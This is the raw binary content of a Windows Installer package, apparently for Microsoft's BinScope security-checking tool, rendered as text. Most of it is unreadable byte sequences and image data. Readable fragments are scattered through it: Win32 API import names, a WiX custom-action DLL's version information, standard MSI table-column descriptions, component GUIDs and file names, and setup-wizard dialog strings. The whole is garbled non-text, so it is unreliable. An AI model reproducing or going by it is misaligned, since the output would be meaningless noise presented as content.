tionFilterIsDebuggerPresent�EncodePointer�TlsAlloc�TlsGetValue�TlsSetValue�TlsFree�InterlockedIncrementGetModuleHandleW�InterlockedDecrementEGetProcAddress�SleepExitProcessoSetHandleCountdGetStdHandle�InitializeCriticalSectionAndSpinCount�GetFileTypecGetStartupInfoW�DeleteCriticalSectionaFreeEnvironmentStringsW�GetEnvironmentStringsW�HeapCreate�HeapDestroy�QueryPerformanceCounteryGetSystemTimeAsFileTimerGetCPInfohGetACP7GetOEMCP IsValidCodePageiGetStringTypeW9LeaveCriticalSection�EnterCriticalSectionRtlUnwind�GetConsoleCP�GetConsoleMode�SetStdHandle$WriteConsoleW�CreateFileWWFlushFileBuffers�GlobalFree�GlobalAllocH��P\\�H�P�X��r�e�uica.dllValidatePathPrintEula�����N�@���D������������� abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZp��\`�y�!��������@~�����ڣ ��@����ڣ ��A��Ϣ���\[��@~��QQ�^� \_�j�2������1~������Ct�p�l�h�d�\`�\\�T�L�D�8�,�$�������������������������������������������|�x�l�X�L� D�<�4�,�$����������������������x�p�h�\`�X�P�H�@�8�(�����p���Կ����������x�d�<�(���������������h��������x� ! 5A CPR S WYl m pr � � � �� �)� ��� ���K�K�K�K�K�K�K�K�K�K�..��(((((((((��,,,,,,,������\`\` �������. �8�P�h� � ��0@��3Z�@4VS\_VERSION\_INFO�����?�StringFileInfoz000004E4LCompanyNameMicrosoft CorporationTFileDescriptionWiX UI Custom Actions6FileVersion3.7.1224.0\*InternalNameuica�;LegalCopyrightCopyright (c) Microsoft Corporation.� All rights reserved.: OriginalFilenameuica.dllLProductNameWindows Installer XML:ProductVersion3.7.1224.0DVarFileInfo$Translation� PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDB0P0e0�0�0�0111<1L1e1�1�1�1�1�1�1�1�1F2m2z2�2�2�2�2�2�2�2�2�23@3P3t3~3�3�3�3�3�3�3�3 4474A4O4f4�4�4�4�45&5-5\\5f5�5�5�5666J6P6Z6�6�6�6�6�6�6�6�6&707V7h7�7�7�7�7888F8P8r8y8�8�8�8�899$9.9I9N9Y9^9�9�9�9�9�9:$:+:8:Y:c:m:v:�:�:�:�:�:�:;;;;);7;K;v;{;�;�;�<\]=x=&>O> d0�2323h3t3�3�3�3�3�3444'4D4X4b4r4x4~4�4�4�4�4�4�4�4555%5+5<5d5x5~5�5�5�566%6+616O6t6�6�6�6�6 77"7>7O7�7�7�7�7898\]8i8s8�8�8�8�8�8�8�8 99-9:9\[9e9w9~9�9�9�9�9�9�9�9: ::#:):H:R:�:�:�;�;<%<�<�<�<�<3=�=�=O>\\>�>�>�>�>????9?\_?}?�?�?�?�?�?�?�?�?�?�?�?�?�?0Xb0m0�0�0�0�0�0�0�01 1$1(1,1014181<1�1�1�1�1�12l2|2�2�2�2�233 3Y3�3�3�3�3�3�34g4�4\*5\\5t5{5�5�5�5�5�5�5�56666666 6j6p6t6x6|6�6�677777=7g7�7�7�7�7�7�7�7�7�788888�8�8�8�8�:�:�;�;�;�;�;�;�;�;�;<<<<<%<-<9\->3>9>O>g>�>?\*?4?l?t?�?�?�?�?�?�?@0000#0-030I0N0V0\\0c0i0p0v0~0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�01 1111#1\*191>1D1M1m1s1�1�1�1�1�12 2D2M2Y2�2�2�2�2�2�2�2�2p3x3�3�3�3�3�3�3�3�3�344(404@4F4W4�4�4�4�4�4�45�5�5�5�5-646I6�6�6�6�6�67O7a7�7�7�7�7�788,8d8n8�8�8�8�8�8�:�:�:�:�:�:6;<;X;�;�;�;�;�; <<:�?�?P�0000\*0S0\[0�011�2�2�2�2�2�23 3A3L3V3o3y3�3�3�34/4�4�45t5�566'696T6\\6d6{6�6�6�6�6�6�6�67,7=7Q7�7�748�8K9y9�9::U:�;�;�<)=G=m=�=�=�=\`�12�3�34&4 6b8f8j8n8r8v8z8~8�8�8}9�9�9�9�9�9�9):E:h:{:�:�:�:�:�:�:�:;';.;G;\[;a;j;};�;�;5">Y>\_>d>r>w>|>�>�>�>�>�>??T?Y?\`?e?l?q??�?�?�?p�w0�0�0�0�0�0�0�0L1Q1Z1i1�1�1�1�1222�2�2�2�233y3�3�3�3�34"4\*404>4r44�4�4�4.5\\5�678\[8�8=9 :�:�:C;.?@?R?d?v?�?�?�?�?�?�?��00,0>0P0b0t0�0�0�01H1p12b23%34>4�46�6�7�7�778V8�8%9M9�9/:R:d:j:�:�:�:�:�:�:�:�:�:;!;/;D;N;t;�;�;�;�;�>�>�>�>�>�>�>�>�>�>? ?5?b?�?�?�?�?�?�?�?�?�2222 2$2>>�4t;|;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;<<<<�D�6�687T7X7x7�7�7�7�7�78(8H8d8h8�8�8�8�8�89(9H9h9t9�9�9�9�0�4�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�566666666 6$6(6,6064686<6@6P6T6X6\\6\`6d6h6l6p6t6x6|6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6X7h7x7�7�7�7�7�7�7�7�7�7�7x:|:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:;;;�=C��J�A��J�?��J�=��J�;��J�;��J�;��J�9��J�9��J�;��J�=��J�>��J�=��J�>��J�?��J�@��J�A��J�@��J�A��J�BMt6(�8>������������������ʦ @ \` � � � �@@ @@@\`@�@�@�@�\`\` \`@\`\`\`�\`�\`�\`��� �@�\`���������� �@�\`���������� �@�\`���������� �@�\`�������@@ @@@\`@�@�@�@�@ @ @ @@ \`@ �@ �@ �@ �@@@@ @@@@@\`@@�@@�@@�@@�@\`@\` @\`@@\`\`@\`�@\`�@\`�@\`�@�@� @�@@�\`@��@��@��@��@�@� @�@@�\`@��@��@��@��@�@� @�@@�\`@��@��@��@��@�@� @�@@�\`@��@�@��@���� �@�\`��������� � � @� \`� �� �� �� ��@�@ �@@�@\`�@��@��@��@��\`�\` �\`@�\`\`�\`��\`��\`��\`����� ��@��\`���������������� ��@��\`���������������� ��@��\`���������������� ��@��\`������������� �@�\`��������� � � @� \`� �� �� �� ��@�@ �@@�@\`�@��@��@��@��\`�\` �\`@�\`\`�\`��\`��\`��\`����� ��@��\`���������������� ��@��\`���������������� ��@��\`���������������������������W��J�\\��J�\_��J�b��J�g��J�j��J�m��J�p��J�s��J�v��J�g��J�\_��J�Y��J�U��J�O��J�M��J�I��J�G��J�C��J�B��J�C��J�D��J�E��J�D��J�E��J�F��J�G��J�;��J�; ��J�9��J�9��J�9��J�9��J�9��J�7��J�7��J�7��J�7��J�7��J�7��J�5��J�5��J�5��J�5��J�5��J�3��J�3��J�3��J�3��J�3��J�3��J�1��J�1��J�1��J�1��J�1��J�/��J�/��J�/��J�/��J�/��J�/��J�-��J�-��J�-��J�-��J�-��J�+��J�+��J�+��J�+��J�+��J�+��J�)��J�)��J�)��J�)��J�)��J�'��J�'��J�'��J�'��J�'��J�'��J�%��J�%��J�%��J�%��J�%��J�#��J�#��J�#��J�#��J�#��J�#��J�!��J�!��J�!��J�!��J�!��J�!��J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J� ��J� ��J���J���J���J���J���J���J� ��J�(#��J�'&��J�&)��J�%,��J�$/��J�#0��J�$3��J�'6��J�(9��J�)<��J�,?��J�-B��J�.E��J�/F��J�0I��J�1L��J�2O��J�3R��J�4U��J�5X��J�6Y��J�7\\��J�8\_��J�9b��J�:e��J�;h��J����J����J����J����J����J����J����J����J����J����J����J����J����J����J����J����J����J����J����J����J����J����J����J����J�/��J�/��J�/��J�/��J�/��J�1��J�1��J�1��J�3��J�3��J�3��J�5��J�7��J�7��J�9��J�=��J�<��J�;��J�:��J�9��J�:��J�9��J�8��J�7��J�6��J�5��J�4��J�3=���J�2=���J�1=���J�0=���J�/����J�.�5���J�+����J�\*�5���J�)����J�(�5���J�%����J�$�5���J�!����J� ������J��������J����� ������J���������J�� ����� ���J���������J����������J�����������J�������������J�����������J����������J�����������J������������J������� ����J����� �����J������ ������J�����������J���������J���������J���������J�������������J�������������J�� ��������J�������������J���� �������J������������J���� �������J���������J����������J������������J�� ������� ���J��������J�� ��������J����������J��� �����J������J��5���J�����J��5���J�����J��5���J�����J��5���J�����J�=���J�=���J�=���J�=���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J���J�333$DDD@133333333332DDDC33333333332DDD33333333333$DD133333333333$D@13333333333332D3333333333333"#33333333333333333333333�����������������?�?�������������������������������������� �&(( @����������������������������pwppp�p�pww�wwwp��www����wwp�������ww���������wp����������ww�����������wp������������wp�������������w�������������wx��������������w��������������w��������������w��������������w��������������w��������������px��������������p��������������������������������������������������������������������pw�������wwx����wwwwp�������������������������?�������������?��������( �������������������������������p���wx����p������p������w������������������������������������w����pwwwp�������������(( ������������������������������������������������������������������� �������}��������(( �������������������������������������������������������������������������������������������������������12345678:99;?CFILORUX\[^adhknqux<@DGJMPSVY\\\_beilorvy=AAAAAAAAAAAAffffssA��������������������>BEHKNQTWZ\]\`cgjmptwz++������������������000000000������������������������� !#%!1257:>DDDDDDDDDDDDDDDODOQSDSWDSWDSWDSWDSWDSWDSDSDSDDDDDDDDDDOOOQQDQDDMLEEFFGGHHIIJKNPPNRT\[HHUVVXVVYFFZFFGGG\\H\]I^IVVFFGGHHII\_\`a\_\`\_a\`a}~)\*+{{{{{{{{����������������������������������������������'''''''''0000000BBB���7~~~~���~��������~~����������������������~~���������������������� �������..��12277���fffqbdfhforffffffffffffzfdffddddff|�ddff|�fff�ffdgg�dgg|bddff�dgggddff�ddff�ddff�ddff�ddff���ddff�ddff�ddff�dgbdgh�dmdg�g�g�dg|���pc��m�pp�wstuvxy����p����������������������������'����������'0���������������������������������������������c�i�{i�B �0�99999e99999999999999999{999999�~�}��~�}�9999999VPP99T}9~�~��9PVn�~���~���~���~���~��:-���3�����3�����3������7~��6�2���~2������5�~����2������~�2���3���5���2�����������������3����4����2������~2��5~���3����2���2��� "$&()�2��,/A@�2��49= 6;?C��3����������������~���7���|�~������~������������������~������������� ��\*��.��1��27�����������38<)))))))\*\*\*\*\*\*\*+++++++++{{{{{{{{{{{{{{�����������������������������������������������������������������������������������������������������������������������'''''''''''00000000000000000BBBBBBB}�����}�����}�������}7|~���������}~�����������}�������}~������}�����������������������������}��������}������}~�����~}������}�������������� !#%}������\*+.}������!1257:>}�����������5|�������������������������������������������5������|���������0���쀴�����0���쀴�����0���쀴�������\*����0��F�E���������0�����d�d�0�d�d��d�d�d�������0�뀦�������0����������0�����쀇���0����H�0�������F�����������������0�����ԀԀ0��f��������0������0�����0��f�����0�����쀇���0��������p��Ԁ0������ԀԀԀԀԀԀԀԀ������������0������������0�������<�<�<�(�(�<�(�<�<�����0������F�������P�������F������n���7�ʀ��:�7�7�S����,���5����,��d�P�P��P�P��P�P�P��7���,�����W��7�����,��d���F�������}�d���9�9���,����d�A��A��A��A��A��s�d�P����������9��5���,�ꀖ����5����,��x���9�P�������P�����,����π�<����,������������F��F��F��F��F�����,����d�<�x�����,����U�����A�v�U�������F�������܀܀8�r�r�8�8�܀܀8�r�r�8�8�܀܀8�r�r�8�8�܀܀�Ȁ�@�8�8�,�܀�@�@�r�r�r��J�Ȁ8�r�r�r�J�8�8�̀8�8��8�8�8��J�Ȁr�r�r�8�8�8�J��J�Ȁ8�8�r�r�r�J�1�܀܀8�r�r�8�8�܀܀�8�8�8�r�r�r�8�8��J�J�J�J�J�J�J�J�J�J�J�2�܀܀8�r�r�8�P�P��8��J�Ȁr�r�r�J�8�8��J�Ȁ8�r�r�r�J��8�܀܀8�r�r�8�8�܀T�Ȁ8�r�r�r�8�8�J�8�J�P�8�r�r�r�8�P�P�P�P�P�P�P�P�,�@�,�@�,�@�,�@�,�@��Ȁ8�r�r�r�8�8�@�"�8�T�T�8�r�r�r�8�8����P�P��P���܀܀8�r�r�8�8�P�<������P�<������(�<������(�P������� �P��b� �,����2���,���x���<����������,���������-����,���P�-��<�������������,����� �#��#��#��#��#�� � �<�<�����������Z��,���F����<���,���d����<�<������<����,�����������,�������������P��P��P��P��P����,�����������,��������������<�<�������������������������������8������8�������������������P����������������������������������P��������������������������������P��������F������������P������������������������������������������������������������������������������������8}}}���~~~�~���~���~��99jkl9999999999999}���������������������������������������������������������������������������������������������������������������������������������c�A�A�11��)\*+{��������������'0B2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�r�r�r�r�r��r�r�r��r�r��r�r��r�r�r�r�r�r������i����U���U���U�������������������������'�����������������������������|~��~������~~����1����~~�~������~~���1�����~��������~~������=Afs������AA�����������{�����������������������������������������;?CFILORUX\[^adhknquxBEHKNQTWZ\]\`cgjmptw?CFILORUX\[^adhknquB��K���W�\]�c������'��������k���-������G������(���$�"������������pppppp��ppp������������������� �� �������� ��������h& ��( +!"#$%'(-.�����������2� ����x�܅��ș����d���@��(�����p�ԗۅ̪+!"#)\*+,����B������2� ��������1������d��������W�e�������Ƌ����%�3������й�������������P�\`����������s�y?�J^�g�%KZcjmtw�������5F\`��e��$C�D��lǮ(������E�)o���Ħ�?��$Ab\*"yK)�c)S.�bX��I���n��S�i�3��Y��G�@.�M�{�V0A�$m\[����٢�k�!���咋���©��5�LG�\[P�dA�U�Θ���������-J\_�������������A99���������������������'�'�����>z��������;x������0�����?������������=;=��( @�������� ������������������ !#%')+-/13579;=?ACE�������������� "$&(\*,.02468:<>@BDF���������u���GG�JHJN�HK����OMIL")\*+,159?GI\[bk�����������������������)��""")))\*\*\*++,,1155999999???GGGGGGGGGGGGIIIIIIIIII\[\[\[\[bbbbbbkkkkk������������������������������������������������������������������������������������������ � ����������������������������������� � ����������� � ������������������������������������������������������������������������ ������������������������� ��������������� #%'#%'#%',.,3,9;>A%D?��HGMPRA,WYIvxPRA}��H\]#%H\]df%i#nqsH\]d���}��>A��������A'3#%'#%'%,������n������,�MPRY����.�������������������������������g�u�������~e�le�bs�l�������~���n�uu�����������C�U��������g�\[p�^�⋎߁��y��u��y�݃�ڛu���Ȫ������'�?�������N�R|�\`��|�咝↕���z��z�߃�ݚY�\`���×�������1�������z�s��l�띻럲瓪㍤∟���㋵�z�|�����������!�9���������~�ځ�≰�~��u��n��l��l��w�ܒg�k����������1�G �'�% �'�+�-�-�%u�z�Ɂ����������������������3�E��������h& ��( ������������������e�stɀ����������̪����!����������Ӽ������%���������G�Wz�������W�e�������Ƌ����%�3������й������������p�~��P�\`����������s�y?�J^�g�%������֥����i�b����|�ځ1�=�����Ԗ������z�璛������Æ��ƭ�؞���=�J������吲咋���©��5�LG�\[P�dA�U�Θ���������-��Dz�����ץ�i�y/�GG�NE�G�O�\_�Ϥ��������܆�?�T�%-�C���������ӛ�Δ����������?��������������?�( @��������������������������ٲٸ������������������������u����)�=�ܽ���������������'�=�������Ƌ����������������)��������w̓����������5�����������ܢ������������P�\`�����������������������טΟ�-s�zw�����������%�������������b�k������g����������n�z���������i�u���˰���Y�\`n����������������������������Ȳ��p ~���������\]�k���������uƁ�������Ԙ��\[��������������������������������beb�ypu������Γ����������Խ��������½�!e+e7�CJ�U5�AWb���5�I��������ڍї��������I�U���k�pk�rz��|߃�ڐd�lY������������g�u�������~e�le�bs�l�������~���n�uu�����������C�U��������g�\[p�^�⋎߁��y��u��y�݃�ڛu���Ȫ������'�?�������N�R|�\`��|�咝↕���z��z�߃�ݚY�\`���×�������1�������z�s��l�띻럲瓪㍤∟���㋵�z�|�����������!�9���������~�ځ�≰�~��u��n��l��l��w�ܒg�k����������1�G �'�% �'�+�-�-�%u�z�Ɂ����������������������3�E�����������E�W'�?)�A1�I9�P?�T=�R1�IA�U����������������������í͠������������W�g=�TI�\]R�e\]�nd�sb�rT�e;�Pb�p����������������躯Û�����Ƞ�����������l�|yㆁ��n�~R�e/�G3�J|�z���������U�\]���L�^������������~�b�sA�U�5�������Ћ�������������������������i�yJ�^)�A�%���g�u����������������n�~P�d5�J�5�%#�;�ְ���������������i�y;�P'�?\`�p���������������������������������������������������������?�?��������@HAxD�B�D�A�E�D1H�������������@HB'C$H )���������@H�E�;�Ch<�E+H��������������@HYE�DhE7G\*���������@@HA'C�:�E�D1H�������������$@HB\*C�E5G+�����@HBj=�A�ErE#(����� @HB�D9BC/B������������� @HB�E�E�C(H'�����$@H�<B�E ��������������@H�DjE�A(H�������������@@H?dA/B6H,�����D@H?;�C8D�E�������������H@H??wElDj>�D/H�������������D @H??wElDj;�E$H-�����MsiDigitalSignatureEx.������������� DigitalSignature$������������5-\*���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� ��A � ������� �����H����H����H����H�H�H��H��H�@�H�&�H����H�H�H���H�2�������H��2�2�H��������2�2�2�H�2�2���H�2�2������H��H����H�2�2�2�&�&�@�����H��&�H�H�H����H����H��H����H��������H��@�@���@��� �H�H������H��@������2�H�������H�H�������H�H���H��H�����������H� ����H���&��������H��g 7 L6$�q B �o ( 5�'( \* ;> � '��"5dXV/0O=R�= 68 8f 7�DdTS^.:W s q./N\[ BQ|�� ) 6R K9�.:>� kQ !s9c%A?vJ#OHHr{n� 76 �f#7 H- >0zra\_5<!?n �� 4Gr$ @E && $ pg�} 3$; ~ ~\`#\`8 :&#& &4& & & & &&&& &&&& & & & &&# $ JG , �F\* @� �8 � R=" ;":+9 ) 9\*9 )9 ) �; %R�F$�>� 51<& xw5-,G�t 1�0 �0 �0 �0 �N% $/7t!) 9) �&F.6 BP)-)-" / :4 dHb A-$"%::";& & t S4 6 32 " ' /44 %%!$6-66$-76PT\* W--"'f c 1lYY\\3���� + &" ��ݿV$9Uif2����y>����KM�rM�NameTableTypeColumnValue\_ValidationNPropertyId\_SummaryInformationDescriptionSetCategoryKeyColumnMaxValueNullableKeyTableMinValueIdentifierName of tableName of columnY;NWhether the column is nullableYMinimum value allowedMaximum value allowedFor foreign key, Name of table to which data must linkColumn to which foreign key connectsText;Formatted;Template;Condition;Guid;Path;Version;Language;Identifier;Binary;UpperCase;LowerCase;Filename;Paths;AnyPath;WildCardFilename;RegPath;CustomSource;Property;Cabinet;Shortcut;FormattedSDDLText;Integer;DoubleInteger;TimeDate;DefaultDirString categoryTextSet of values that are permittedDescription of columnAdminExecuteSequenceActionName of action to invoke, either in the engine or the handler DLL.ConditionOptional expression which skips the action if evaluates to expFalse.If the expression syntax is invalid, the engine will terminate, returning iesBadActionData.SequenceNumber that determines the sort order in which the actions are to be executed. Leave blank to suppress action.AdminUISequenceAdvtExecuteSequenceAppSearchPropertyThe property associated with a SignatureSignature\_Signature;RegLocator;IniLocator;DrLocator;CompLocatorThe Signature\_ represents a unique file signature and is also the foreign key in the Signature, RegLocator, IniLocator, CompLocator and the DrLocator tables.BinaryUnique key identifying the binary data.DataThe unformatted binary data.CheckBoxA named property to be tied to the item.FormattedThe value string associated with the item.ComponentPrimary key used to identify a particular component record.ComponentIdGuidA string GUID unique to this component, version, and language.Directory\_DirectoryRequired key of a Directory table record. This is actually a property name whose value contains the actual path, set either by the AppSearch action or with the default setting obtained from the Directory table.AttributesRemote execution option, one of irsEnumA conditional statement that will disable this component if the specified condition evaluates to the 'True' state. If a component is disabled, it will not be installed, regardless of the 'Action' state associated with the component.KeyPathFile;Registry;ODBCDataSourceEither the primary key into the File table, Registry table, or ODBCDataSource table. This extract path is stored when the component is installed, and is used to detect the presence of the component and to return the path to it.ControlDialog\_DialogExternal key to the Dialog table, name of the dialog.Name of the control. This name must be unique within a dialog, but can repeat on different dialogs. The type of the control.XHorizontal coordinate of the upper left corner of the bounding rectangle of the control.Vertical coordinate of the upper left corner of the bounding rectangle of the control.WidthWidth of the bounding rectangle of the control.HeightHeight of the bounding rectangle of the control.A 32-bit word that specifies the attribute flags to be applied to this control.The name of a defined property to be linked to this control. A string used to set the initial text contained within a control (if appropriate).Control\_NextThe name of an other control on the same dialog. This link defines the tab order of the controls. The links have to form one or more cycles!HelpThe help strings used with the button. The text is optional. ControlConditionA foreign key to the Dialog table, name of the dialog.Control\_A foreign key to the Control table, name of the control.Default;Disable;Enable;Hide;ShowThe desired action to be taken on the specified control.A standard conditional statement that specifies under which conditions the action should be triggered.ControlEventA foreign key to the Control table, name of the controlEventAn identifier that specifies the type of the event that should take place when the user interacts with control specified by the first two entries.ArgumentA value to be used as a modifier when triggering a particular event.A standard conditional statement that specifies under which conditions an event should be triggered.OrderingAn integer used to order several events tied to the same control. Can be left blank.CustomActionPrimary key, name of action, normally appears in sequence table unless private use.The numeric custom action type, consisting of source location, code type, entry, option flags.SourceCustomSourceThe table reference of the source of the code.TargetExcecution parameter, depends on the type of custom actionExtendedTypeA numeric custom action type that extends code type or option flags of the Type column.Name of the dialog.HCenteringHorizontal position of the dialog on a 0-100 scale. 0 means left end, 100 means right end of the screen, 50 center.VCenteringVertical position of the dialog on a 0-100 scale. 0 means top end, 100 means bottom end of the screen, 50 center.Width of the bounding rectangle of the dialog.Height of the bounding rectangle of the dialog.A 32-bit word that specifies the attribute flags to be applied to this dialog.TitleA text string specifying the title to be displayed in the title bar of the dialog's window.Control\_FirstDefines the control that has the focus when the dialog is created.Control\_DefaultDefines the default control. Hitting return is equivalent to pushing this button.Control\_CancelDefines the cancel control. Hitting escape or clicking on the close icon on the dialog is equivalent to pushing this button.Unique identifier for directory entry, primary key. If a property by this name is defined, it contains the full path to the directory.Directory\_ParentReference to the entry in this table specifying the default parent directory. A record parented to itself or with a Null parent represents a root of the install tree.DefaultDirThe default sub-path under parent's path.EventMappingA foreign key to the Dialog table, name of the Dialog.An identifier that specifies the type of the event that the control subscribes to.AttributeThe name of the control attribute, that is set when this event is received.FeaturePrimary key used to identify a particular feature record.Feature\_ParentOptional key of a parent record in the same table. If the parent is not selected, then the record will not be installed. Null indicates a root item.Short text identifying a visible feature item.Longer descriptive text describing a visible feature item.DisplayNumeric sort order, used to force a specific display ordering.LevelThe install level at which record will be initially selected. An install level of 0 will disable an item and prevent its display.UpperCaseThe name of the Directory that can be configured by the UI. A non-null value will enable the browse button.0;1;2;4;5;6;8;9;10;16;17;18;20;21;22;24;25;26;32;33;34;36;37;38;48;49;50;52;53;54Feature attributesFeatureComponentsFeature\_Foreign key into Feature table.Component\_Foreign key into Component table.FilePrimary key, non-localized token, must match identifier in cabinet. For uncompressed files, this field is ignored.Foreign key referencing Component that controls the file.FileNameFilenameFile name used for installation, may be localized. This may contain a "short name|long name" pair.FileSizeSize of file in bytes (long integer).VersionVersion string for versioned files; Blank for unversioned files.LanguageList of decimal language Ids, comma-separated if more than one.Integer containing bit flags representing file attributes (with the decimal value of each bit position in parentheses)Sequence with respect to the media images; order must track cabinet order.IconPrimary key. Name of the icon file.Binary stream. The binary icon data in PE (.DLL or .EXE) or icon (.ICO) format.InstallExecuteSequenceInstallUISequenceLaunchConditionExpression which must evaluate to TRUE in order for install to commence.Localizable text to display when condition fails and install must abort.ListBoxA named property to be tied to this item. All the items tied to the same property become part of the same listbox.OrderA positive integer used to determine the ordering of the items within one list..The integers do not have to be consecutive.The value string associated with this item. Selecting the line will set the associated property to this value.The visible text to be assigned to the item. Optional. If this entry or the entire column is missing, the text is the same as the value.MediaDiskIdPrimary key, integer to determine sort order for table.LastSequenceFile sequence number for the last file for this media.DiskPromptDisk name: the visible text actually printed on the disk. This will be used to prompt the user when this disk needs to be inserted.CabinetIf some or all of the files stored on the media are compressed in a cabinet, the name of that cabinet.VolumeLabelThe label attributed to the volume.The property defining the location of the cabinet file.MsiFileHashFile\_Primary key, foreign key into File table referencing file with this hashOptionsVarious options and attributes for this hash.HashPart1HashPart2HashPart3HashPart4Name of property, uppercase if settable by launcher or loader.String value for property. Never null or empty.RadioButtonA named property to be tied to this radio button. All the buttons tied to the same property become part of the same group.The value string associated with this button. Selecting the button will set the associated property to this value.The horizontal coordinate of the upper left corner of the bounding rectangle of the radio button.The vertical coordinate of the upper left corner of the bounding rectangle of the radio button.The width of the button.The height of the button.The visible title to be assigned to the radio button.The help strings used with the button. The text is optional.RegistryPrimary key, non-localized token.RootThe predefined root key for the registry value, one of rrkEnum.KeyRegPathThe key for the registry value.The registry value name.The registry value.Foreign key into the Component table referencing component that controls the installing of the registry value.RegLocatorThe table key. The Signature\_ represents a unique file signature and is also the foreign key in the Signature table. If the type is 0, the registry values refers a directory, and \_Signature is not a foreign key.An integer value that determines if the registry value is a filename or a directory location or to be used as is w/o interpretation.RemoveFileFileKeyPrimary key used to identify a particular file entryForeign key referencing Component that controls the file to be removed.WildCardFilenameName of the file to be removed.DirPropertyName of a property whose value is assumed to resolve to the full pathname to the folder of the file to be removed.InstallMode1;2;3Installation option, one of iimEnum.SignatureThe table key. The Signature represents a unique file signature.The name of the file. This may contain a "short name|long name" pair.MinVersionThe minimum version of the file.MaxVersionThe maximum version of the file.MinSizeThe minimum size of the file.MaxSizeThe maximum size of the file. MinDateThe minimum creation date of the file.MaxDateThe maximum creation date of the file.LanguagesThe languages supported by the file.TextStyleName of the style. The primary key of this table. This name is embedded in the texts to indicate a style change.FaceNameA string indicating the name of the font used. Required. The string must be at most 31 characters long.SizeThe size of the font used. This size is given in our units (1/12 of the system font height). Assuming that the system font is set to 12 point size, this is equivalent to the point size.ColorA long integer indicating the color of the string in the RGB format (Red, Green, Blue each 0-255, RGB = R + 256\*G + 256^2\*B).StyleBitsA combination of style bits.UITextA unique key that identifies the particular string.The localized version of the string.UpgradeUpgradeCodeThe UpgradeCode GUID belonging to the products in this set.VersionMinThe minimum ProductVersion of the products in this set. The set may or may not include products with this particular version.VersionMaxThe maximum ProductVersion of the products in this set. The set may or may not include products with this particular version.A comma-separated list of languages for either products in this set or products not in this set.The attributes of this product set.RemoveThe list of features to remove when uninstalling a product from this set. The default is "ALL".ActionPropertyThe property to set when a product in this set is found.CostInitializeFileCostCostFinalizeInstallValidateInstallInitializeInstallAdminPackageInstallFilesInstallFinalizeFatalErrorUserExitExitDialogExecuteActionPublishFeaturesPublishProductNETFRAMEWORK45NetFramework45WixUIWixcaWixUI\_Bmp\_BannerWixUI\_Bmp\_DialogWixUI\_Ico\_ExclamWixUI\_Ico\_InfoWixUI\_Bmp\_NewWixUI\_Bmp\_UpWIXUI\_EXITDIALOGOPTIONALCHECKBOX1LicenseAcceptedApplicationShortcut{E9E4006E-4009-5A51-94D0-43EFB7C265A5}ApplicationProgramsFolderregA0BACAEEBE934EDD83F55D10AF7A321ABinScopeExe{FD2EFF61-E954-5400-846C-06FC2D99E61B}INSTALLLOCATIONBinscope.exeSdlCommon{A267EEAD-5117-5725-9D81-34E88323C4DB}Microsoft.SecurityDevelopmentLifecycle.SdlCommon.dllSystemCollectionsImmutable{4080014D-3332-5F45-97BA-1065BB25D415}System.Collections.Immutable.dllDia2Lib{7D3DA005-3010-5357-9516-EC24B4628F45}Dia2Lib.dllDebugInfo{42033582-CC69-57B3-86D7-63EFD0FB2388}DebugInfo.dllManagedMd{1DE30D45-1764-5E8C-ABD9-86E3DA98B967}ManagedMD.dllConfigurationParser{DFD42293-968D-5CE3-B3ED-A43F398B49CB}ConfigurationParser.dllMsDia120{681ABE17-F55A-5982-AB17-FE96679488B2}msdia120.dllMsDia120Manifest{4E801B9C-5421-500B-8EB5-11B9C1887FDE}msdia120.dll.manifestSymSrv{941DE079-B43C-500D-9268-2118B6D4944A}symsrv.dllBinScopeLib{A3A55271-2CC2-5295-BEC8-91CFD1DFB7E6}BinScopeLib.dllEula{6FF83C56-DEF7-5102-946E-862F3D05F18B}EULA.rtfCommonChecks{FCB80766-D323-59EA-9A79-A8A4AAB8F9FC}PLUGINSCommonChecks.dllCommonChecksBadHashes{DB484642-3664-5AE5-B4F8-6DCA8CB7F0DE}BadHashes.txtCommonChecksAllowedLibsXml{7A14D7F2-E193-57E5-9D11-4E87AA1714DB}AllowedLibs.xmlWackChecks{9F23DB31-58C1-5D26-B0C7-71565229D4A2}WackChecks.dllCsvReportXslt{EB00FFD5-5E89-5E69-A43A-7215197FA3E8}REPORTINGCSV\_Report.xsltHtmlReportXslt{815E4DF4-B3E7-579F-8220-BE15D3F77059}HTML\_Report.xsltBinScopeInstallLocation{42A5A7D4-D651-572E-BC90-4E229ECA6A35}reg60C5B8053280146B79413C789FA72223BrowseDlgPathEdit\_BrowsePropertyOKPushButtonCancelComboLabel&Look in:DirectoryComboNewFolderUp one level|DirectoryListCreate a new folder|PathLabel&Folder name:BannerBitmapBitmapBannerLineLineBottomLineBrowse to the destination folder{\\WixUI\_Font\_Title}Change destination folderDiskCostDlgHighlighted volumes do not have enough disk space available for selected features. You can either remove some files from the highlighted volumes, install fewer features, or select different destination drives.The disk space required for the installation of the selected features.{\\WixUI\_Font\_Title}Disk Space RequirementsVolumeListVolumeCostList{120}{70}{70}{70}{70}ErrorDlgErrorTextInformation text&YesACErrorIconInformation icon|I&Ignore&NoOR&RetryFinish&FinishBack&Back{\\WixUI\_Font\_Bigger}\[ProductName\] Setup Wizard ended prematurely\[ProductName\] Setup Wizard ended prematurely because of an error. Your system has not been modified. To install this program at a later time, run Setup Wizard again. Click the Finish button to exit the Setup Wizard.FilesInUseRetryIgnoreExitE&xitThe following applications are using files that need to be updated by this setup. Close these applications and then click 